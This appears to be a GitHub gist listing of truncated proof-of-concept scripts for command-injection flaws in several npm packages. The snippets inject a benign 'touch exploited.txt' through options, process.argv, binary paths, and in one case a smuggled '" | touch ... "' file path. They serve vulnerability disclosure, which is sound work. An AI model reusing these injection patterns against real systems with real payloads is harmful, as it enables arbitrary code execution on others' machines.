@mcoimbra
mcoimbra / protractor-video-reporter-0.3.0_poc.js
Created October 29, 2023 23:20
Package protractor-video-reporter: it is possible to take advantage of the 'options' argument of the VideoReporter constructor to execute a custom binary and arguments (authors only focus on ffmpeg executables...).
'use strict'
const pkg = require('protractor-video-reporter');
console.log(pkg);
const options = {
ffmpegCmd: 'touch',
ffmpegArgs: ['exploited.txt']
}
mcoimbra / postinstall-build-5.0.3_poc.js
Created October 29, 2023 22:29
Package postinstall-build: it is possible to inject a custom command and arguments by pushing into process.argv.
'use strict'
const pkg = require('postinstall-build');
process.argv.push('touch');
process.argv.push('touch exploited.txt');
/*
 * This will lead to exec(cmd) with cmd = 'touch exploited.txt' on
 * line #326 of src/index.js.
 */
mcoimbra / pdf-merge-1.2.0_poc.js
Created October 29, 2023 14:44
Package pdf-merge: it is possible to inject a custom binary and arguments for example to create a local file.
'use strict'
const pkg = require('pdf-merge');
const args = ['exploited.txt', ''];
const options = {
libPath: 'touch'
};
/*
mcoimbra / pdf-image-2.0.0_poc.js
Created October 29, 2023 14:27
Package pdf-image: it is possible to inject a custom command to be executed rather than imagemagick (the focus of this package).
'use strict'
const pkg = require('pdf-image');
console.log(pkg);
const pdfFilePath = '" | touch exploited.txt "';
const options = {
};
mcoimbra / msedgedriver-91.0.0_poc.js
Created October 29, 2023 14:07
Package msedgedriver: it is possible to manipulate the binary and arguments passed to spawn by changing 'msedgedriver.path' and configuring 'args'.
'use strict'
const pkg = require('msedgedriver');
pkg.path = '/usr/bin/touch';
const args = ['exploited.txt'];
const returnPromise = false;
// This will create a local 'exploited.txt' file.
mcoimbra / mocha-multi-reporters-1.5.1_poc.js
Created October 29, 2023 13:57
Package mocha-multi-reporters: potential injection through 'require(name)' in src/lib/MultiReporters.js
'use strict'
const fs = require('node:fs');
const path = require('node:path');
/*
* Create a local 'custom.js' file so that the program flow can
* continue within the call below.
*/
const filename = path.join(process.cwd(), 'custom.js');
mcoimbra / karma-cljs-test-0.1.0_poc.js
Created October 28, 2023 22:32
Package karma: although focused on browser JavaScript, it is possible to require() the package and inject a command into another file of the package that can be required.
'use strict'
const pkg = require('karma-cljs-test');
const init = pkg['framework:cljs-test'][1];
const files = [];
init(files);
mcoimbra / harmonize-2.0.0_poc.js
Last active October 28, 2023 21:42
Package harmonize: by editing the process.argv it is possible to influence the command and flags invoked inside harmonize.
'use strict'
const pkg = require('harmonize');
process.argv[0] = 'touch';
process.argv.push('exploited.txt');
const flags = [];
/* This will create a local 'exploited.txt'. */
mcoimbra / git-rev-0.2.1_poc.js
Created October 28, 2023 15:33
Package git-rev@0.2.1: it is possible to execute custom code via a callback.
'use strict'
const pkg = require('git-rev');
const cb = function(error_msg) {
const fs = require('node:fs');
let fd = fs.openSync('exploited.txt', 'a');
fs.closeSync(fd);
}
mcoimbra / git-promise-1.0.0_poc.js
Created October 28, 2023 15:16
Package git-promise: it is possible through the argument to execute a binary which is not 'git', with the package README.md focusing only on running git commands.
'use strict'
const pkg = require('git-promise');
const commandOrArgs = 'exploited.txt';
const optionsOrCallback = {
gitExec: 'touch'
};
const callbackMaybe = function() {};